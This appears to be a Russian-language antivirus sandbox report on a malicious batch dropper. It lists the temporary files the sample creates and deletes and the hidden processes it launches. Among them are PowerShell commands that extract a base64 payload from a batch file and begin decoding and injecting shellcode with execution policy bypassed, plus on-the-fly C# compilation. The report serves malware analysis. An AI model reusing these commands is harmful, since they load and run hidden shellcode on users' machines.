Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\ray.bat
- %APPDATA%\filenameaftercoppy.bat
- %APPDATA%\7000.b64
- %TEMP%\af_deyud.0.cs
- %TEMP%\af_deyud.cmdline
- %TEMP%\af_deyud.out
- %TEMP%\csc362c.tmp
- %TEMP%\res362d.tmp
- %TEMP%\af_deyud.dll
Удаляет следующие файлы
- %TEMP%\res362d.tmp
- %TEMP%\csc362c.tmp
- %TEMP%\af_deyud.cmdline
- %TEMP%\af_deyud.pdb
- %TEMP%\af_deyud.out
- %TEMP%\af_deyud.dll
- %TEMP%\af_deyud.0.cs
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\ray.bat" " (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "$val = (Select-String 'null\s*=\s*(\S+)' filenameaftercoppy.bat).Matches[0].Groups[1].Value; Add-Content -Path '7000.b64' -Value $val"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ep bypass -nop -c "$sc=[Convert]::FromBase64String((Get-Content '7000.b64' -Raw));$len=$sc.Length;$addr=[IntPtr]::Zero;$size=[uint32]$len;$oldProtect=0;$written=0;$t='using System;us...
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\af_deyud.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES362D.tmp" "%TEMP%\CSC362C.tmp" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\dw20.exe' -x -s 1112
